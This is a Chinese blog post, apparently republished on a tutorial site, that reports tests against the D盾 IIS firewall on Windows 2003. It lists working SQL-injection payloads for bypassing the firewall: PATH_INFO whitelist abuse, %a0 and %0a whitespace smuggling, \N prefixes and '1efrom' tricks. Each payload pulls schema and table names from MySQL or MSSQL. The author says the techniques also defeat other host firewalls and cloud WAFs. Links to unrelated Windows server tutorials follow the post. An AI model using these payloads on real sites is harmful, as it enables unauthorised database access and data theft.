Win2003服務(wù)器防SQL注入的D盾、IIS防火墻的測試情況
D盾_IIS防火墻,目前只支持Win2003服務(wù)器,前陣子看見官方博客說D盾新版將近期推出,相信功能會更強(qiáng)大,這邊分享一下之前的SQL注入防御的測試情況。D盾_IIS防火墻注入防御策略,...
D盾_IIS防火墻,目前只支持Win2003服務(wù)器,前陣子看見官方博客說D盾新版將近期推出,相信功能會更強(qiáng)大,這邊分享一下之前的SQL注入防御的測試情況。D盾_IIS防火墻注入防御策略,如下圖,主要防御GET/POST/COOKIE,文件允許白名單設(shè)置。構(gòu)造不同的測試環(huán)境,IIS+(ASP/ASPX/PHP)+(MsSQL/MySQL),看到這邊的策略,主要的測試思路:
a、白名單 b、繞過union select或select from的檢測
0X02 IIS+PHP+MYSQL
搭建這個window2003+IIS+php+mysql,可花費(fèi)不少時間,測試過程還蠻順利的,先來一張攔截圖:
繞過姿勢一:白名單
PHP中的PATH_INFO問題,簡單來說呢,就是
http:/x.x.x.x/3.php?id=1 等價于 http://x.x.x.x/3.php/xxxxxxxxxxxxx?id=1
從白名單中隨便挑個地址加在后面,可成功bypass,http://10.9.10.206/3.php/admin.php?id=1 union select 1,2,schema_name from information_schema.SCHEMATA
經(jīng)測試,GET、POST、COOKIE均有效,完全bypass
繞過姿勢二:空白字符
Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0;
測試了一下,基本上針對MSSQL的[0x01-0x20]都被處理了,唯獨(dú)在Mysql中還有一個%a0可以利用,可以看到%a0與select合體,無法識別,從而繞過。
id=1 union%a0select 1,2,3 from admin
繞過姿勢三:\N形式
主要思考問題,如何繞過union select以及select from?
如果說上一個姿勢是union和select之間的位置的探索,那么是否可以考慮在union前面進(jìn)行檢測呢?
為此在參數(shù)與union的位置,經(jīng)測試,發(fā)現(xiàn)\N可以繞過union select檢測,同樣方式繞過select from的檢測。
id=\Nunion(select 1,schema_name,\Nfrom information_schema.schemata)
b
0X03 IIS+ASP/ASPX+MSSQL
搭建IIS+ASP/ASPX+MSSQL環(huán)境,思路一致,只是語言與數(shù)據(jù)庫特性有些許差異,繼續(xù)來張D盾攔截圖:
繞過姿勢一:白名單
ASP: 不支持,找不到路徑,而且D盾禁止執(zhí)行帶非法字符或特殊目錄的腳本(/1.asp/x),撤底沒戲了
/admin.php/../1.asp?id=1 and 1=1 攔截
/1.asp?b=admin.php&id=1 and 1=1 攔截,可見D盾會識別到文件的位置,并不是只檢測URL存在白名單那么簡單了。。。
ASPX:與PHP類似 /1.aspx/admin.php?id=1 union select 1,'2',TABLE_NAME from INFORMATION_SCHEMA.TABLES 可成功bypass
繞過姿勢二:空白字符
Mssql可以利用的空白字符有:01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
[0x01-0x20]全部都被處理了,想到mysql %a0的漏網(wǎng)之魚是否可以利用一下?
ASP+MSSQL: 不支持%a0,已放棄。。。
ASPX+MSSQL: %a0+%0a配合,可成功繞過union select的檢測
id=1 union%a0%0aselect 1,'2',TABLE_NAME %a0from INFORMATION_SCHEMA.TABLES
繞過姿勢三:1E形式
MSSQL屬于強(qiáng)類型,這邊的繞過是有限制,from前一位顯示位為數(shù)字類型,這樣才能用1efrom繞過select from。
只與數(shù)據(jù)庫有關(guān),與語言無關(guān),故ASP與ASPX一樣,可bypass,id=1eunion select '1',TABLE_NAME,1efrom INFORMATION_SCHEMA.TABLES
0X04 END
不同語言,中間件,數(shù)據(jù)庫,所對應(yīng)的特性有些差異,思路卻一致,實(shí)踐出真知,只要動手去探索,還有更多姿勢等待被挖掘。
目前的測試成果,可成功bypass注入防御,如 安全狗、云鎖、360主機(jī)衛(wèi)士、D盾_IIS防火墻等主機(jī)防護(hù)軟件及各種云waf,有些姿勢都在用。
有對這方面研究的童鞋,歡迎加好友交流一下姿勢。
- windows服務(wù)器下注冊服務(wù)的命令小結(jié)的相關(guān)資料
- 遠(yuǎn)程管理Windows服務(wù)器上的IIS服務(wù)的方法教程
- 基于windows服務(wù)器下wamp多域名的配置操作方法
- windows服務(wù)器第四層負(fù)載均衡_基于NLB負(fù)載均衡詳解
- 阿里云服務(wù)器apache配置SSL證書成功開啟Https的教程
- 在Win2008 r2服務(wù)器英文版IIS7.5上Https、SSL的配置方
- Windows服務(wù)器SSL證書創(chuàng)建、安裝及配置方法教程
- Windows服務(wù)器操作系統(tǒng)安全配置檢查和加固方法
- Windows服務(wù)器啟用/禁用SMBv1、SMBv2和SMBv3的方法教
- windows server 2008 r2 DNS服務(wù)器配置教程圖文詳解
windows服務(wù)器下注冊服務(wù)的命令小結(jié)的相關(guān)資料
文章主要介紹了window下注冊服務(wù)的命令小結(jié)的相關(guān)資料,需要的朋友可以參考下。1. 描述: SC 是用于與服務(wù)控制管理器通信的命令行程序 。用法: sc [command] [servic...
遠(yuǎn)程管理Windows服務(wù)器上的IIS服務(wù)的方法教程
日常管理Windows服務(wù)器上的IIS時一般都是先遠(yuǎn)程連接服務(wù)器桌面然后再直接操作IIS,雖然不是很麻煩,但也是每次都需要輸入服務(wù)器用戶名與密碼,那么今天就為大家介紹一種方法可以在本地的IIS上直接管理服務(wù)器上的IIS,不需要每次都進(jìn)入服務(wù)器進(jìn)行管理了。...
基于windows服務(wù)器下wamp多域名的配置操作方法
本文將詳細(xì)介紹windows下wamp多域名的配置方法,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧修改hosts文件hosts文件的位置:系統(tǒng)盤→“windows&rd...
windows服務(wù)器第四層負(fù)載均衡_基于NLB負(fù)載均衡詳解
小編為大家分享一篇windows第四層負(fù)載均衡_基于NLB負(fù)載均衡詳解,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧...
阿里云服務(wù)器apache配置SSL證書成功開啟Https的教程
文章主要介紹了阿里云服務(wù)器apache配置SSL證書成功開啟Https(記錄趟過的各種坑),需要的朋友可以參考下環(huán)境:阿里云云服務(wù)器 Windows Server 2008 標(biāo)準(zhǔn)版 SP2 中文版(趁1212優(yōu)...
在Win2008 r2服務(wù)器英文版IIS7.5上Https、SSL的配置方法
在win2008 r2 英文版 IIS7.5上配置Https,SSL的方法,在非服務(wù)器、而且沒有證書頒發(fā)機(jī)構(gòu)(Certificate Authority簡稱CA)的開發(fā)環(huán)境中,配置HTTPS,SSL用于測試或?qū)W習(xí) 。...
Windows服務(wù)器SSL證書創(chuàng)建、安裝及配置方法教程
文章主要介紹了windows服務(wù)器ssl證書創(chuàng)建、安裝及配置方法,用IIS發(fā)布https網(wǎng)站,SSL的安全服務(wù)配置步驟:...
Windows服務(wù)器操作系統(tǒng)安全配置檢查和加固方法
本文檔旨在指導(dǎo)系統(tǒng)管理人員或安全檢查人員進(jìn)行Windows操作系統(tǒng)的安全合規(guī)性檢查和配置,需要的朋友可以參考下。1. 賬戶管理和認(rèn)證授權(quán)1.1 賬戶默認(rèn)賬戶安全禁用Guest賬戶。...
Windows服務(wù)器啟用/禁用SMBv1、SMBv2和SMBv3的方法教程
文章主要介紹了如何在 Windows 和 Windows Server 中啟用/禁用 SMBv1、SMBv2 和 SMBv3的方法,需要的朋友可以參考下。如何在 SMB 客戶端和服務(wù)器組件上啟用/禁用服務(wù)器消息...
windows server 2008 r2 DNS服務(wù)器配置教程圖文詳解
DNS服務(wù)器的作用就是幫助用戶使用簡單好記的域名來訪問網(wǎng)絡(luò)上的主機(jī)和網(wǎng)絡(luò)服務(wù)。這篇文章主要介紹了windows server 2008 r2 DNS服務(wù)器配置圖文教程,需要的朋友可以參考下。...